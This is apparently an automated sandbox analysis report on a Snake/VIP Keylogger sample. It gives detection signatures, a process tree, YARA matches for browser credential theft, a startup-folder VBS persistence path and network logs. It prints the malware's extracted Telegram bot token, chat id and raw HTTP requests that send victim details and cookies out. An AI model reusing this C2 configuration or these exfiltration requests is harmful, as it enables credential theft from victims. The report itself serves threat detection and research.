Windows Analysis Report
6BRa130JDj.exe

Overview

General Information

Sample name: 6BRa130JDj.exe (renamed because the original name is a hash value)
Original sample name: e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87.exe
Analysis ID: 1588367
MD5: cb47b81059d6e0b15ad2ab00c3491c48
SHA1: 4cf91a5e49a4d17f2c0d35bc52dee15ecdf155dc
SHA256: e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6BRa130JDj.exe (PID: 4824 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
    • ectosphere.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
      • RegSvcs.exe (PID: 2804 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5428 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ectosphere.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
      • RegSvcs.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat id": "1886630858", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat_id": "1886630858", "Version": "4.4"}
Source | Rule | Description | Author | Strings
Source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0xcec4:$a1: get_encryptedPassword
  • 0xd1e1:$a2: get_encryptedUsername
  • 0xccd4:$a3: get_timePasswordChanged
  • 0xcddd:$a4: get_passwordField
  • 0xceda:$a5: set_encryptedPassword
  • 0xe54a:$a7: get_logins
  • 0xe4ad:$a10: KeyLoggerEventArgs
  • 0xe112:$a11: KeyLoggerEventArgsEventHandler
Source: 00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(31 further memory entries not shown)
Source | Rule | Description | Author | Strings
Source: 3.2.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 3.2.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 3.2.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 3.2.RegSvcs.exe.400000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x2e0c4:$a1: get_encryptedPassword
  • 0x2e3e1:$a2: get_encryptedUsername
  • 0x2ded4:$a3: get_timePasswordChanged
  • 0x2dfdd:$a4: get_passwordField
  • 0x2e0da:$a5: set_encryptedPassword
  • 0x2f74a:$a7: get_logins
  • 0x2f6ad:$a10: KeyLoggerEventArgs
  • 0x2f312:$a11: KeyLoggerEventArgsEventHandler
Source: 3.2.RegSvcs.exe.400000.0.unpack | Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
  • 0x3be57:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3b4fa:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3b757:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3c136:$a5: \Kometa\User Data\Default\Login Data
(27 further unpacked PE entries not shown)

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", ProcessId: 5428, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs", ProcessId: 5428, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Allene\ectosphere.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs

Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-01-11T01:27:44.030882+0100  2803305  3         Unknown Traffic          192.168.2.5  49706        104.21.80.1      443               TCP
2025-01-11T01:27:52.052474+0100  2803305  3         Unknown Traffic          192.168.2.5  49730        104.21.80.1      443               TCP
2025-01-11T01:27:59.327823+0100  2803305  3         Unknown Traffic          192.168.2.5  55420        104.21.80.1      443               TCP
2025-01-11T01:28:00.629747+0100  2803305  3         Unknown Traffic          192.168.2.5  55431        104.21.80.1      443               TCP
2025-01-11T01:27:42.543737+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49704        193.122.6.168    80                TCP
2025-01-11T01:27:43.449972+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49704        193.122.6.168    80                TCP
2025-01-11T01:27:44.715728+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  49707        193.122.6.168    80                TCP
2025-01-11T01:27:57.856250+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  55408        193.122.6.168    80                TCP
2025-01-11T01:27:58.731232+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  55408        193.122.6.168    80                TCP
2025-01-11T01:28:00.045467+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  55426        193.122.6.168    80                TCP
2025-01-11T01:28:01.328649+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  55438        193.122.6.168    80                TCP
2025-01-11T01:28:02.637495+0100  2803274  2         Potentially Bad Traffic  192.168.2.5  55446        193.122.6.168    80                TCP
2025-01-11T01:28:00.809278+0100  1810008  1         Potentially Bad Traffic  192.168.2.5  55432        149.154.167.220  443               TCP
2025-01-11T01:28:15.302844+0100  1810008  1         Potentially Bad Traffic  192.168.2.5  55539        149.154.167.220  443               TCP
2025-01-11T01:27:54.453173+0100  1810007  1         Potentially Bad Traffic  192.168.2.5  49749        149.154.167.220  443               TCP
2025-01-11T01:28:09.331890+0100  1810007  1         Potentially Bad Traffic  192.168.2.5  55499        149.154.167.220  443               TCP


AV Detection

Source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat_id": "1886630858", "Version": "4.4"}
Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat id": "1886630858", "Version": "4.4"}
Source: RegSvcs.exe.6148.7.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendMessage"}
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | ReversingLabs: Detection: 75%
Source: 6BRa130JDj.exe | ReversingLabs: Detection: 75%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Joe Sandbox ML: detected
Source: 6BRa130JDj.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 6BRa130JDj.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:55414 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:55499 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0031445A
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031C6D1 FindFirstFileW,FindClose, 0_2_0031C6D1
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0031C75C
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0031EF95
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0031F0F2
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0031F3F3
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_003137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_003137EF
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00313B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00313B12
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0031BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0031BCBC
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose, 2_2_0008445A
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008C6D1 FindFirstFileW,FindClose, 2_2_0008C6D1
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_0008C75C
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0008EF95
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_0008F0F2
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_0008F3F3
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_000837EF
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00083B12
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_0008BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0124F45Dh | 3_2_0124F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0124F45Dh | 3_2_0124F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0124FC19h | 3_2_0124F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E31E0h | 3_2_066E2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EE501h | 3_2_066EE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E0D0Dh | 3_2_066E0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E1697h | 3_2_066E0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E2C19h | 3_2_066E2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EE0A9h | 3_2_066EDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EE959h | 3_2_066EE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EF209h | 3_2_066EEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066ECF49h | 3_2_066ECCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066ED7F9h | 3_2_066ED550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E31E0h | 3_2_066E2DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EEDB1h | 3_2_066EEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EF661h | 3_2_066EF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_066E0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EFAB9h | 3_2_066EF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066ED3A1h | 3_2_066ED0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066E31E0h | 3_2_066E310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 066EDC51h | 3_2_066ED9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0189F45Dh | 7_2_0189F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0189F45Dh | 7_2_0189F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0189FC19h | 7_2_0189F961

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49749 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:55432 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:55499 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:55539 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.5:55387 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1; Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285; Host: api.telegram.org; Content-Length: 1279
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1; Content-Type: multipart/form-data; boundary=------------------------8dd326de7d68210; Host: api.telegram.org; Content-Length: 1279
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55438 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55426 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55408 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55446 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 104.21.80.1:443
